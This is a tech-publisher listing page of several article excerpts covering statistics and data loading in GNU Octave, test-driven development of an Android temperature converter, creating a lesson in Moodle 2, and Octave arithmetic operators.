Loading data files When performing a statistical analysis of a particular problem, you often have some data stored in a file. You can save your variables (or the entire workspace) using different file formats and then load them back in again. Octave can, of course, also load data from files generated by other programs. There are certain restrictions when you do this which we will discuss here. In the following matter, we will only consider ASCII files, that is, readable text files. When you load data from an ASCII file using the load command, the data is treated as a two-dimensional array. We can then think of the data as a matrix where lines represent the matrix rows and columns the matrix columns. For this matrix to be well defined, the data must be organized such that all the rows have the same number of columns (and therefore the columns the same number of rows). For example, the content of a file called series.dat can be: Next we to load this into Octave's workspace: octave:1> load -ascii series.dat; whereby the data is stored in the variable named series. In fact, Octave is capable of loading the data even if you do not specify the ASCII format. The number of rows and columns are then: octave:2> size(series) ans = 4 3 I prefer the file extension .dat, but again this is optional and can be anything you wish, say .txt, .ascii, .data, or nothing at all. In the data files you can have: Octave comments Data blocks separated by blank lines (or equivalent empty rows) Tabs or single and multi-space for number separation Thus, the following data file will successfully load into Octave: # First block 1 232 334 2 245 334 3 456 342 4 555 321 # Second block 1 231 334 2 244 334 3 450 341 4 557 327 The resulting variable is a matrix with 8 rows and 3 columns. If you know the number of blocks or the block sizes, you can then separate the blocked-data. Now, the following data stored in the file bad.dat will not load into Octave's workspace: 1 232.1 334 2 245.2 3 456.23 4 555.6 because line 1 has three columns whereas lines 2-4 have two columns. If you try to load this file, Octave will complain: octave:3> load -ascii bad.dat error: load: bad.dat: inconsisitent number of columns near line 2 error:load: unable to extract matrix size from file 'bad.dat' Simple descriptive statistics Consider an Octave function mcintgr and its vectorized version mcintgrv. This function can evaluate the integral for a mathematical function f in some interval [a; b] where the function is positive. The Octave function is based on the Monte Carlo method and the return value, that is, the integral, is therefore a stochastic variable. When we calculate a given integral, we should as a minimum present the result as a mean or another appropriate measure of a central value together with an associated statistical uncertainty. This is true for any other stochastic variable, whether it is the height of the pupils in class, length of a plant's leaves, and so on. In this section, we will use Octave for the most simple statistical description of stochastic variables. Histogram and moments Let us calculate the integral given in Equation (5.9) one thousand times using the vectorized version of the Monte Carlo integrator: octave:4> for i=1:1000 > s(i) = mcintgrv("sin", 0, pi, 1000); > endfor The array s now contains a sequence of numbers which we know are approximately 2. Before we make any quantitative statistical description, it is always a good idea to first plot a histogram of the data as this gives an approximation to the true underlying probability distribution of the variable s. The easiest way to do this is by using Octave's hist function which can be called using: octave:5> hist(s, 30, 1) The first argument, s, to hist is the stochastic variable, the second is the number of bins that s should be grouped into (here we have used 30), and the third argument gives the sum of the heights of the histogram (here we set it to 1). The histogram is shown in the figure below. If hist is called via the command hist(s), s is grouped into ten bins and the sum of the heights of the histogram is equal to sum(s). From the figure, we see that mcintgrv produces a sequence of random numbers that appear to be normal (or Gaussian) distributed with a mean of 2. This is what we expected. It then makes good sense to describe the variable via the sample mean defined as: where N is the number of samples (here 1000) and si the i'th data point, as well as the sample variance given by: The variance is a measure of the distribution width and therefore an estimate of the statistical uncertainty of the mean value. Sometimes, one uses the standard deviation instead of the variance. The standard deviation is simply the square root of the variance To calculate the sample mean, sample variance, and the standard deviation in Octave, you use: octave:6> mean(s) ans = 1.9999 octave:7> var(s) ans = 0.002028 octave:8> std(s) ans = 0.044976 In the statistical description of the data, we can also include the skewness which measures the symmetry of the underlying distribution around the mean. If it is positive, it is an indication that the distribution has a long tail stretching towards positive values with respect to the mean. If it is negative, it has a long negative tail. The skewness is often defined as: We can calculate this in Octave via: octave:9> skewness(s) ans = -0.15495 This result is a bit surprising because we would assume from the histogram that the data set represents numbers picked from a normal distribution which is symmetric around the mean and therefore has zero skewness. It illustrates an important point—be careful to use the skewness as a direct measure of the distributions symmetry—you need a very large data set to get a good estimate. You can also calculate the kurtosis which measures the flatness of the sample distribution compared to a normal distribution. Negative kurtosis indicates a relative flatter distribution around the mean and a positive kurtosis that the sample distribution has a sharp peak around the mean. The kurtosis is defined by the following: It can be calculated by the kurtosis function. octave:10> kurtosis(s) ans = -0.02310 The kurtosis has the same problem as the skewness—you need a very large sample size to obtain a good estimate. Sample moments As you may know, the sample mean, variance, skewness, and kurtosis are examples of sample moments. The mean is related to the first moment, the variance the second moment, and so forth. Now, the moments are not uniquely defined. One can, for example, define the k'th absolute sample moment pka and k'th central sample moment pkc as: Notice that the first absolute moment is simply the sample mean, but the first central sample moment is zero. In Octave, you can easily retrieve the sample moments using the moment function, for example, to calculate the second central sample moment you use: octave:11> moment(s, 2, 'c') ans = 0.002022 Here the first input argument is the sample data, the second defines the order of the moment, and the third argument specifies whether we want the central moment 'c' or absolute moment 'a' which is the default. Compare the output with the output from Command 7—why is it not the same?
Read more
  • 0
  • 0
  • 8890
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €14.99/month. Cancel anytime
article-image-android-application-testing-tdd-and-temperature-converter
Packt
27 Jun 2011
7 min read
Save for later

Android application testing: TDD and the temperature converter

Packt
27 Jun 2011
7 min read
Getting started with TDD Briefly, Test Driven Development is the strategy of writing tests along the development process. These test cases are written in advance of the code that is supposed to satisfy them. A single test is added, then the code needed to satisfy the compilation of this test and finally the full set of test cases is run to verify their results. This contrasts with other approaches to the development process where the tests are written at the end when all the coding has been done. Writing the tests in advance of the code that satisfies them has several advantages. First, is that the tests are written in one way or another, while if the tests are left till the end it is highly probable that they are never written. Second, developers take more responsibility for the quality of their work. Design decisions are taken in single steps and finally the code satisfying the tests is improved by refactoring it. This UML activity diagram depicts the Test Driven Development to help us understand the process: The following sections explain the individual activities depicted in this activity diagram. Writing a test case We start our development process with writing a test case. This apparently simple process will put some machinery to work inside our heads. After all, it is not possible to write some code, test it or not, if we don't have a clear understanding of the problem domain and its details. Usually, this step will get you face to face with the aspects of the problem you don't understand, and you need to grasp if you want to model and write the code. Running all tests Once the test is written the obvious following step is to run it, altogether with other tests we have written so far. Here, the importance of an IDE with built-in support of the testing environment is perhaps more evident than in other situations and this could cut the development time by a good fraction. It is expected that firstly, our test fails as we still haven't written any code! To be able to complete our test, we usually write additional code and take design decisions. The additional code written is the minimum possible to get our test to compile. Consider here that not compiling is failing. When we get the test to compile and run, if the test fails then we try to write the minimum amount of code necessary to make the test succeed. This may sound awkward at this point but the following code example in this article will help you understand the process. Optionally, instead of running all tests again you can just run the newly added test first to save some time as sometimes running the tests on the emulator could be rather slow. Then run the whole test suite to verify that everything is still working properly. We don't want to add a new feature by breaking an existing one. Refactoring the code When the test succeeds, we refactor the code added to keep it tidy, clean, and minimal. We run all the tests again, to verify that our refactoring has not broken anything and if the tests are again satisfied, and no more refactoring is needed we finish our task. Running the tests after refactoring is an incredible safety net which has been put in place by this methodology. If we made a mistake refactoring an algorithm, extracting variables, introducing parameters, changing signatures or whatever your refactoring is composed of, this testing infrastructure will detect the problem. Furthermore, if some refactoring or optimization could not be valid for every possible case we can verify it for every case used by the application and expressed as a test case. What is the advantage? Personally, the main advantage I've seen so far is that you focus your destination quickly and is much difficult to divert implementing options in your software that will never be used. This implementation of unneeded features is a wasting of your precious development time and effort. And as you may already know, judiciously administering these resources may be the difference between successfully reaching the end of the project or not. Probably, Test Driven Development could not be indiscriminately applied to any project. I think that, as well as any other technique, you should use your judgment and expertise to recognize where it can be applied and where not. But keep this in mind: there are no silver bullets. The other advantage is that you always have a safety net for your changes. Every time you change a piece of code, you can be absolutely sure that other parts of the system are not affected as long as there are tests verifying that the conditions haven't changed. Understanding the testing requirements To be able to write a test about any subject, we should first understand the Subject under test. We also mentioned that one of the advantages is that you focus your destination quickly instead of revolving around the requirements. Translating requirements into tests and cross-referencing them is perhaps the best way to understand the requirements, and be sure that there is always an implementation and verification for all of them. Also, when the requirements change (something that is very frequent in software development projects), we can change the tests verifying these requirements and then change the implementation to be sure that everything was correctly understood and mapped to code. Creating a sample project—the Temperature Converter Our examples will revolve around an extremely simple Android sample project. It doesn't try to show all the fancy Android features but focuses on testing and gradually building the application from the test, applying the concepts learned before. Let's pretend that we have received a list of requirements to develop an Android temperature converter application. Though oversimplified, we will be following the steps you normally would to develop such an application. However, in this case we will introduce the Test Driven Development techniques in the process. The list of requirements Most usual than not, the list of requirements is very vague and there is a high number of details not fully covered. As an example, let's pretend that we receive this list from the project owner: The application converts temperatures from Celsius to Fahrenheit and vice-versa The user interface presents two fields to enter the temperatures, one for Celsius other for Fahrenheit When one temperature is entered in one field the other one is automatically updated with the conversion If there are errors, they should be displayed to the user, possibly using the same fields Some space in the user interface should be reserved for the on screen keyboard to ease the application operation when several conversions are entered Entry fields should start empty Values entered are decimal values with two digits after the point Digits are right aligned Last entered values should be retained even after the application is paused User interface concept design Let's assume that we receive this conceptual user interface design from the User Interface Design team: Creating the projects Our first step is to create the project. As we mentioned earlier, we are creating a main and a test project. The following screenshot shows the creation of the TemperatureConverter project (all values are typical Android project values): When you are ready to continue you should press the Next > button in order to create the related test project. The creation of the test project is displayed in this screenshot. All values will be selected for you based on your previous entries:
Read more
  • 0
  • 0
  • 2037

article-image-android-application-testing-adding-functionality-ui
Packt
27 Jun 2011
10 min read
Save for later

Android Application Testing: Adding Functionality to the UI

Packt
27 Jun 2011
10 min read
  Android Application Testing Guide Build intensively tested and bug free Android applications  The user interface is in place. Now we start adding some basic functionality. This functionality will include the code to handle the actual temperature conversion. Temperature conversion From the list of requirements from the previous article we can obtain this statement: When one temperature is entered in one field the other one is automatically updated with the conversion. Following our plan we must implement this as a test to verify that the correct functionality is there. Our test would look something like this: @UiThreadTest public final void testFahrenheitToCelsiusConversion() { mCelsius.clear(); mFahrenheit.clear(); final double f = 32.5; mFahrenheit.requestFocus(); mFahrenheit.setNumber(f); mCelsius.requestFocus(); final double expectedC = TemperatureConverter.fahrenheitToCelsius(f); final double actualC = mCelsius.getNumber(); final double delta = Math.abs(expectedC - actualC); final String msg = "" + f + "F -> " + expectedC + "C but was " + actualC + "C (delta " + delta + ")"; assertTrue(msg, delta < 0.005); } Firstly, as we already know, to interact with the UI changing its values we should run the test on the UI thread and thus is annotated with @UiThreadTest. Secondly, we are using a specialized class to replace EditText providing some convenience methods like clear() or setNumber(). This would improve our application design. Next, we invoke a converter, named TemperatureConverter, a utility class providing the different methods to convert between different temperature units and using different types for the temperature values. Finally, as we will be truncating the results to provide them in a suitable format presented in the user interface we should compare against a delta to assert the value of the conversion. Creating the test as it is will force us to follow the planned path. Our first objective is to add the needed code to get the test to compile and then to satisfy the test's needs. The EditNumber class In our main project, not in the tests one, we should create the class EditNumber extending EditText as we need to extend its functionality. We use Eclipse's help to create this class using File | New | Class or its shortcut in the Toolbars. This screenshot shows the window that appears after using this shortcut: The following table describes the most important fields and their meaning in the previous screen:     Field Description Source folder: The source folder for the newly-created class. In this case the default location is fine. Package: The package where the new class is created. In this case the default package com.example.aatg.tc is fine too. Name: The name of the class. In this case we use EditNumber. Modifiers: Modifiers for the class. In this particular case we are creating a public class. Superclass: The superclass for the newly-created type. We are creating a custom View and extending the behavior of EditText, so this is precisely the class we select for the supertype. Remember to use Browse... to find the correct package. Which method stubs would you like to create? These are the method stubs we want Eclipse to create for us. Selecting Constructors from superclass and Inherited abstract methods would be of great help. As we are creating a custom View we should provide the constructors that are used in different situations, for example when the custom View is used inside an XML layout. Do you want to add comments? Some comments are added automatically when this option is selected. You can configure Eclipse to personalize these comments. Once the class is created we need to change the type of the fields first in our test: public class TemperatureConverterActivityTests extends ActivityInstrumentationTestCase2<TemperatureConverterActivity> { private TemperatureConverterActivity mActivity; private EditNumber mCelsius; private EditNumber mFahrenheit; private TextView mCelsiusLabel; private TextView mFahrenheitLabel; ... Then change any cast that is present in the tests. Eclipse will help you do that. If everything goes well, there are still two problems we need to fix before being able to compile the test: We still don't have the methods clear() and setNumber() in EditNumber We don't have the TemperatureConverter utility class To create the methods we are using Eclipse's helpful actions. Let's choose Create method clear() in type EditNumber. Same for setNumber() and getNumber(). Finally, we must create the TemperatureConverter class. Be sure to create it in the main project and not in the test project. Having done this, in our test select Create method fahrenheitToCelsius in type TemperatureConverter. This fixes our last problem and leads us to a test that we can now compile and run. Surprisingly, or not, when we run the tests, they will fail with an exception: 09-06 13:22:36.927: INFO/TestRunner(348): java.lang. ClassCastException: android.widget.EditText 09-06 13:22:36.927: INFO/TestRunner(348): at com.example.aatg. tc.test.TemperatureConverterActivityTests.setUp( TemperatureConverterActivityTests.java:41) 09-06 13:22:36.927: INFO/TestRunner(348): at junit.framework. TestCase.runBare(TestCase.java:125) That is because we updated all of our Java files to include our newly-created EditNumber class but forgot to change the XMLs, and this could only be detected at runtime. Let's proceed to update our UI definition: <com.example.aatg.tc.EditNumber android_layout_height="wrap_content" android_id="@+id/celsius" android_layout_width="match_parent" android_layout_margin="@dimen/margin" android_gravity="right|center_vertical" android_saveEnabled="true" /> That is, we replace the original EditText by com.example.aatg.tc.EditNumber which is a View extending the original EditText. Now we run the tests again and we discover that all tests pass. But wait a minute, we haven't implemented any conversion or any handling of values in the new EditNumber class and all tests passed with no problem. Yes, they passed because we don't have enough restrictions in our system and the ones in place simply cancel themselves. Before going further, let's analyze what just happened. Our test invoked the mFahrenheit.setNumber(f) method to set the temperature entered in the Fahrenheit field, but setNumber() is not implemented and it is an empty method as generated by Eclipse and does nothing at all. So the field remains empty. Next, the value for expectedC—the expected temperature in Celsius is calculated invoking TemperatureConverter.fahrenheitToCelsius(f), but this is also an empty method as generated by Eclipse. In this case, because Eclipse knows about the return type it returns a constant 0. So expectedC becomes 0. Then the actual value for the conversion is obtained from the UI. In this case invoking getNumber() from EditNumber. But once again this method was automatically generated by Eclipse and to satisfy the restriction imposed by its signature, it must return a value that Eclipse fills with 0. The delta value is again 0, as calculated by Math.abs(expectedC – actualC). And finally our assertion assertTrue(msg, delta < 0.005) is true because delta=0 satisfies the condition, and the test passes. So, is our methodology flawed as it cannot detect a simple situation like this? No, not at all. The problem here is that we don't have enough restrictions and they are satisfied by the default values used by Eclipse to complete auto-generated methods. One alternative could be to throw exceptions at all of the auto-generated methods, something like RuntimeException("not yet implemented") to detect its use when not implemented. But we will be adding enough restrictions in our system to easily trap this condition. TemperatureConverter unit tests It seems, from our previous experience, that the default conversion implemented by Eclipse always returns 0, so we need something more robust. Otherwise this will be only returning a valid result when the parameter takes the value of 32F. The TemperatureConverter is a utility class not related with the Android infrastructure, so a standard unit test will be enough to test it. We create our tests using Eclipse's File | New | JUnit Test Case, filling in some appropriate values, and selecting the method to generate a test as shown in the next screenshot. Firstly, we create the unit test by extending junit.framework.TestCase and selecting com.example.aatg.tc.TemperatureConverter as the class under test: Then by pressing the Next > button we can obtain the list of methods we may want to test: We have implemented only one method in TemperatureConverter, so it's the only one appearing in the list. Other classes implementing more methods will display all the options here. It's good to note that even if the test method is auto-generated by Eclipse it won't pass. It will fail with the message Not yet implemented to remind us that something is missing. Let's start by changing this: /** * Test method for {@link com.example.aatg.tc. TemperatureConverter#fahrenheitToCelsius(double)}. */ public final void testFahrenheitToCelsius() { for (double c: conversionTableDouble.keySet()) { final double f = conversionTableDouble.get(c); final double ca = TemperatureConverter.fahrenheitToCelsius(f); final double delta = Math.abs(ca - c); final String msg = "" + f + "F -> " + c + "C but is " + ca + " (delta " + delta + ")"; assertTrue(msg, delta < 0.0001); } } Creating a conversion table with values for different temperature conversion we know from other sources would be a good way to drive this test. private static final HashMap<Double, Double> conversionTableDouble = new HashMap<Double, Double>(); static { // initialize (c, f) pairs conversionTableDouble.put(0.0, 32.0); conversionTableDouble.put(100.0, 212.0); conversionTableDouble.put(-1.0, 30.20); conversionTableDouble.put(-100.0, -148.0); conversionTableDouble.put(32.0, 89.60); conversionTableDouble.put(-40.0, -40.0); conversionTableDouble.put(-273.0, -459.40); } We may just run this test to verify that it fails, giving us this trace: junit.framework.AssertionFailedError: -40.0F -> -40.0C but is 0.0 (delta 40.0)at com.example.aatg.tc.test.TemperatureConverterTests. testFahrenheitToCelsius(TemperatureConverterTests.java:62) at java.lang.reflect.Method.invokeNative(Native Method) at android.test.AndroidTestRunner.runTest(AndroidTestRunner. java:169) at android.test.AndroidTestRunner.runTest(AndroidTestRunner. java:154) at android.test.InstrumentationTestRunner.onStart( InstrumentationTestRunner.java:520) at android.app.Instrumentation$InstrumentationThread.run( Instrumentation.java:1447) Well, this was something we were expecting as our conversion always returns 0. Implementing our conversion, we discover that we need some ABSOLUTE_ZERO_F constant: public class TemperatureConverter { public static final double ABSOLUTE_ZERO_C = -273.15d; public static final double ABSOLUTE_ZERO_F = -459.67d; private static final String ERROR_MESSAGE_BELOW_ZERO_FMT = "Invalid temperature: %.2f%c below absolute zero"; public static double fahrenheitToCelsius(double f) { if (f < ABSOLUTE_ZERO_F) { throw new InvalidTemperatureException( String.format(ERROR_MESSAGE_BELOW_ZERO_FMT, f, 'F')); } return ((f - 32) / 1.8d); } } Absolute zero is the theoretical temperature at which entropy would reach its minimum value. To be able to reach this absolute zero state, according to the laws of thermodynamics, the system should be isolated from the rest of the universe. Thus it is an unreachable state. However, by international agreement, absolute zero is defined as 0K on the Kelvin scale and as -273.15°C on the Celsius scale or to -459.67°F on the Fahrenheit scale. We are creating a custom exception, InvalidTemperatureException, to indicate a failure providing a valid temperature to the conversion method. This exception is created simply by extending RuntimeException: public class InvalidTemperatureException extends RuntimeException { public InvalidTemperatureException(String msg) { super(msg); } } Running the tests again we now discover that testFahrenheitToCelsiusConversion test fails, however testFahrenheitToCelsius succeeds. This tells us that now conversions are correctly handled by the converter class but there are still some problems with the UI handling this conversion. A closer look at the failure trace reveals that there's something still returning 0 when it shouldn't. This reminds us that we are still lacking a proper EditNumber implementation. Before proceeding to implement the mentioned methods, let's create the corresponding tests to verify what we are implementing is correct.
Read more
  • 0
  • 0
  • 1253

article-image-android-application-testing-getting-started
Packt
24 Jun 2011
9 min read
Save for later

Android Application Testing: Getting Started

Packt
24 Jun 2011
9 min read
We will avoid introductions to Android and the Open Handset Alliance (http://www.openhandsetalliance.com) as they are covered in many books already and I am inclined to believe that if you are reading this article covering this more advanced topic you have started with Android development before. However, we will be reviewing the main concepts behind testing and the techniques, frameworks, and tools available to deploy your testing strategy on Android. Brief history Initially, when Android was introduced by the end of 2007, there was very little support for testing in the platform, and for some of us very accustomed to using testing as a component intimately coupled with the development process, it was the time to start developing some frameworks and tools to permit this approach. By that time Android had some rudimentary support for unit testing using JUnit (https://junit.org/junit5/), but it was not fully supported and even less documented. In the process of writing my own library and tools, I discovered Phil Smith's Positron , an Open Source library and a very suitable alternative to support testing on Android, so I decided to extend his excellent work and bring some new and missing pieces to the table. Some aspects of test automation were not included and I started a complementary project to fill that gap, it was consequently named Electron. And although positron is the anti-particle of the electron, and they annihilate if collide, take for granted that that was not the idea, but more the conservation of energy and the generation of some visible light and waves. Later on, Electron entered the first Android Development Challenge (ADC1) in early 2008 and though it obtained a rather good score in some categories, frameworks had no place in that competition. Should you be interested in the origin of testing on Android, please find some articles and videos that were published in my personal blog (http://dtmilano.blogspot.co.uk/search/label/electron). By that time Unit Tests could be run on Eclipse. However, testing was not done on the real target but on a JVM on the local development computer. Google also provided application instrumentation code through the Instrumentation class. When running an application with instrumentation turned on, this class is instantiated for you before any of the application code, allowing you to monitor all of the interaction the system has with the application. An Instrumentation implementation is described to the system through an AndroidManifest.xml file. Software bugs It doesn't matter how hard you try and how much time you invest in design and even how careful you are when programming, mistakes are inevitable and bugs will appear. Bugs and software development are intimately related. However, the term bugs to describe flaws, mistakes, or errors has been used in hardware engineering many decades before even computers were invented. Notwithstanding the story about the term bug coined by Mark II operators at Harvard University, Thomas Edison wrote this in 1878 in a letter to Puskás Tivadar showing the early adoption of the term: "It has been just so in all of my inventions. The first step is an intuition, and comes with a burst, then difficulties arise — this thing gives out and [it is] then that 'Bugs' — as such little faults and difficulties are called — show themselves and months of intense watching, study and labor are requisite before commercial success or failure is certainly reached." How bugs severely affect your projects Bugs affect many aspects of your software development project and it is clearly understood that the sooner in the process you find and squash them, the better. It doesn't matter if you are developing a simple application to publish on the Android Market, you are re-branding the Android experience for an operator, or creating a customized version of Android for a device manufacturer, bugs will delay your shipment and will cost you money. From all of the software development methodologies and techniques, Test Driven Development, an agile component of the software development process, is likely the one that forces you to face your bugs earlier in the development process and thus it is also likely that you will solve more problems up front. Furthermore, the increase in productivity can be clearly appreciated in a project where a software development team uses this technique versus one that is, in the best of the cases, writing tests at the end of the development cycle. If you have been involved in software development for the mobile industry, you will have reasons to believe that with all the rush this stage never occurs. It's funny because usually, this rush is to solve problems that could have been avoided. In a study conducted by the National Institute of Standards and Technology (USA) in 2002, it was reported that software bugs cost the country economy $59.5 billion annually. More than a third of this cost can be avoided if better software testing is performed. But please, don't misunderstand this message. There are no silver bullets in software development and what will lead you to an increase in productivity and manageability of your project is the discipline applying these methodologies and techniques to stay in control. Why, what, how, and when to test You should understand that early bug detection saves huge amount of project resources and reduces software maintenance costs. This is the best known reason to write software tests for your development project. Increased productivity will soon be evident. Additionally, writing the tests will give you a deeper understanding of the requirements and the problem to be solved. You will not be able to write tests for a piece of software you don't understand. This is also the reason behind the approach of writing tests to clearly understand legacy or third party code and having the infrastructure to confidently change or update it. The more the code is covered by your tests, the higher could be your expectations of discovering the hidden bugs. If during this coverage analysis you find that some areas of your code are not exercised, additional tests should be added to cover this code as well. This technique requires a special instrumented Android build to collect probe data and must be disabled for any release code because the impact on performance could severely affect application behavior. To fill in this gap, enter EMMA (http://emma.sourceforge.net/), an open-source toolkit for measuring and reporting Java code coverage, that can offline instrument classes for coverage. It supports various coverage types: class method line basic block Coverage reports can also be obtained in different output formats. EMMA is supported up to some degree by the Android framework and it is possible to build an EMMA instrumented version of Android. This screenshot shows how an EMMA code coverage report is displayed in the Eclipse editor, showing green lines when the code has been tested, provided the corresponding plugin is installed. (Move the mouse over the image to enlarge it.) Unfortunately, the plugin doesn't support Android tests yet, so right now you can use it for your JUnit tests only. Android coverage analysis report is only available through HTML. Tests should be automated and you should run some or all tests every time you introduce a change or addition to your code in order to ensure that all the conditions that were met before are still met and that the new code satisfies the tests as expected. This leads us to the introduction of Continuous Integration. It relies on the automation of tests and building processes. If you don't use automated testing, it is practically impossible to adopt Continuous Integration as part of the development process and it is very difficult to ensure that changes would not break existing code. What to test Strictly speaking you should test every statement in your code but this also depends on different criteria and can be reduced to test the path of execution or just some methods. Usually there's no need to test something that can't be broken, for example it usually makes no sense to test getters and setters as you probably won't be testing the Java compiler on your own code and the compiler would have already performed its tests. In addition to the functional areas you should test, there are some specific areas of Android applications that you should consider. We will be looking at these in the following sections. Activity lifecycle events You should test that your activities handle lifecycle events correctly. If your activity should save its state during onPause() or onDestroy() events and later be able to restore it in onCreate(Bundle savedInstanceState), you should be able to reproduce and test all these conditions and verify that the state was correctly saved and restored. Configuration-changed events should also be tested as some of these events cause the current Activity to be recreated, and you should test correct handling of the event and the newly created Activity preserves the previous state. Configuration changes are triggered even by rotation events, so you should test you application's ability to handle these situations. Database and filesystem operations Database and filesystem operations should be tested to ensure that they are handled correctly. These operations should be tested in isolation at the lower system level, at a higher level through ContentProviders, or from the application itself. To test these components in isolation, Android provides some mock objects in the android.test.mock package. Physical characteristics of the device Much before delivering your application you should be sure that all of the different devices it can be run on are supported or at less you should detect the situation and take pertinent measures. Among other characteristics of the devices, you may find that you should test: Network capabilities Screen densities Screen resolutions Screen sizes Availability of sensors Keyboard and other input devices GPS External storage In this respect Android Virtual Devices play an important role because it is practically impossible to have access to all of the devices with all of the possible combinations of features but you can configure AVD for almost every situation. However, as it was mentioned before, leave your final tests for actual devices where the real users will run the application to understand its behavior.
Read more
  • 0
  • 0
  • 4626

article-image-how-create-lesson-moodle-2
Packt
24 Jun 2011
7 min read
Save for later

How to Create a Lesson in Moodle 2

Packt
24 Jun 2011
7 min read
  History Teaching with Moodle 2 Create a History course in Moodle packed with lessons and activities to make learning and teaching History interactive and fun  Approaching the lesson We plan to introduce our Year 7 History class to the idea of the Doomsday Book as a means by which William reinforced his control over the country. William was naturally curious about the country he had just conquered. He was particularly keen to find out how much it was worth. He despatched officials to every village with detailed questions to ask about the land that they worked on and the animals that they farmed with. He also sent soldiers who threatened to kill people who lied. All of the records from these village surveys were collated into the Doomsday Book. Many Saxons detested the process and the name of the book is derived from this attitude of loathing towards something they regarded as intrusive and unfair. William died before the process could be completed. Clear lesson objectives can be stated at the start of the lesson. Students would be expected to work through each page and answer questions identical to those found in the Quiz module. The lesson gives students the opportunity to return to a page if the required level of understanding has not been achieved. The lesson questions help students to reach an understanding at their own pace. The short video clips we intend to use will come from the excellent National Archive website. It has links to short sequences of approximately ninety seconds in which actors take on the role of villagers and commissioners and offer a variety of opinions about the nature and purpose of the survey that they are taking part in. At the end of the lesson, we want the students to have an understanding of: The purpose of the Domesday Book How the information was compiled A variety of attitudes towards the whole process Our starting point is to create a flow diagram that captures the routes a student might take through the lesson: The students will see the set of objectives, a short introduction to the Doomsday Book, and a table of contents. They can select the videos in any order. When they have watched each video and answered the questions associated with the content they will be asked to write longer answers to a series of summative questions. These answers are marked individually by the teacher who thus gets a good overall idea of how well the students have absorbed the information. The assessment of these questions could easily include our essay outcomes marking scale. The lesson ends when the student has completed all of the answers. The lesson requires: A branch table (the table of contents). Four question pages based upon a common template. One end of branch page. A question page for the longer answers. An end of lesson page. The lesson awards marks for the correct answers to questions on each page in much the same way as if they were part of a quiz. Since we are only adding one question per page the scores for these questions are of less significance than a student's answers to the essay questions at the end of the lesson. It is after all, these summative questions that allow the students to demonstrate their understanding of the content they have been working with. Moodle allows this work to be marked in exactly the same way as if it was an essay. This time it will be in the form of an online essay and will take up its place in the Gradebook. We are, therefore, not interested in a standard mark for the students' participation in the lesson and when we set the lesson up, this will become apparent through the choices we make.   Setting up a lesson It is important to have a clear idea of the lesson structure before starting the creation of the lesson. We have used paper and pen to create a flow diagram. We know which images, videos, and text are needed on each page and have a clear idea of the formative and summative questions that will enable us to challenge our students and assess how well they have understood the significance of the Doomsday Book. We are now in a position to create the lesson: Enter the Year 7 History course and turn on editing. In Topic 1, select Add an Activity and click Lesson. In the Name section, enter an unambiguous name for the lesson as this is the text that students will click on to enter the lesson. Enter the values as shown in the following screenshot: In the General section, we do not want to impose a time limit on the lesson. We do need to state how many options there are likely to be on each question page. For multiple choice questions, there are usually four options. In the Grade section, we want the essay that they compose at the end of the lesson to be marked in the same way that other essays have been marked. In the Grade options, our preference is to avoid using the lesson questions as an assessment activity. We want it to be a practice lesson where students can work through the activities without needing to earn a score. We have turned off scoring. The students' final essay submission will be marked in line with our marking policy. Students can retake it as many times as they want to. In the Flow control section, we have clicked the Show advanced button to see all of the options available. We want students to be able to navigate the pages to check answers and go back to review answers if necessary. They can take the lesson as often as they want as we intend it to be used for revision purposes for a timed essay or in the summer examination. We have ignored the opportunity to add features such as menus and progress bars as we will be creating our own navigation system. This section also concerns the look and feel of the pages if set to a slide show, an option we are not planning to use. We are planning to create a web link on each page rather than have students download files so we will not be using the Popup to file or web page option. If you are concerned about the stability of your Internet connection for the weblinks to videos you plan to show, there is an alternative option. This would involve downloading the files to your computer and converting them to .flv files. They can then be uploaded to the file picker in the usual way and a link can be created to each one using the Choose a file button shown here. Moodle's video player would play the videos and you would not be reliant on an unstable Internet connection to see the results. The Dependent on section allows further restrictions to be imposed that are not appropriate for this lesson. We do however, want to mark the essay that will be submitted in accordance with the custom marking scheme developed earlier in the course. The box in the Outcomes section must be checked. Clicking the Save and return to course button ensures that the newly created lesson, The Domesday Book, awaits in Topic 1.  
Read more
  • 0
  • 0
  • 3864
article-image-interacting-gnu-octave-operators
Packt
20 Jun 2011
6 min read
Save for later

Interacting with GNU Octave: Operators

Packt
20 Jun 2011
6 min read
GNU Octave Beginner's Guide Become a proficient Octave user by learning this high-level scientific numerical tool from the ground up The reader will benefit from the previous article on GNU Octave Variables. Basic arithmetic Octave offers easy ways to perform different arithmetic operations. This ranges from simple addition and multiplication to very complicated linear algebra. In this section, we will go through the most basic arithmetic operations, such as addition, subtraction, multiplication, and left and right division. In general, we should think of these operations in the framework of linear algebra and not in terms of arithmetic of simple scalars. Addition and subtraction We begin with addition. Time for action – doing addition and subtraction operations I have lost track of the variables! Let us start afresh and clear all variables first: octave:66> clear (Check with whos to see if we cleared everything). Now, we define four variables in a single command line(!) octave:67> a = 2; b=[1 2 3]; c=[1; 2; 3]; A=[1 2 3; 4 5 6]; Note that there is an important difference between the variables b and c; namely, b is a row vector, whereas c is a column vector. Let us jump into it and try to add the different variables. This is done using the + character: octave:68>a+a ans = 4 octave:69>a+b ans = 3 4 5 octave:70>b+b ans = 2 4 6 octave:71>b+c error: operator +: nonconformant arguments (op1 is 1x3, op2 is 3x1) It is often convenient to enter multiple commands on the same line. Try to test the difference in separating the commands with commas and semicolons. What just happened? The output from Command 68 should be clear; we add the scalar a with itself. In Command 69, we see that the + operator simply adds the scalar a to each element in the b row vector. This is named element-wise addition. It also works if we add a scalar to a matrix or a higher dimensional array. Now, if + is applied between two vectors, it will add the elements together element-wise if and only if the two vectors have the same size, that is, they have same number of rows or columns. This is also what we would expect from basic linear algebra. From Command 70 and 71, we see that b+b is valid, but b+c is not, because b is a row vector and c is a column vector—they do not have the same size. In the last case, Octave produces an error message stating the problem. This would also be a problem if we tried to add, say b with A: octave:72>b+A error: operator +: nonconformant arguments (op1 is 1x3, op2 is 2x3) From the above examples, we see that adding a scalar to a vector or a matrix is a special case. It is allowed even though the dimensions do not match! When adding and subtracting vectors and matrices, the sizes must be the same. Not surprisingly, subtraction is done using the - operator. The same rules apply here, for example: octave:73> b-b ans = 0 0 0 is fine, but: octave:74> b-c error: operator -: nonconformant arguments (op1 is 1x3, op2 is 2x3) produces an error. Matrix multiplication The * operator is used for matrix multiplication. Recall from linear algebra that we cannot multiply any two matrices. Furthermore, matrix multiplication is not commutative. For example, consider the two matrices: The matrix product AB is defined, but BA is not. If A is size n x k and B has size k x m, the matrix product AB will be a 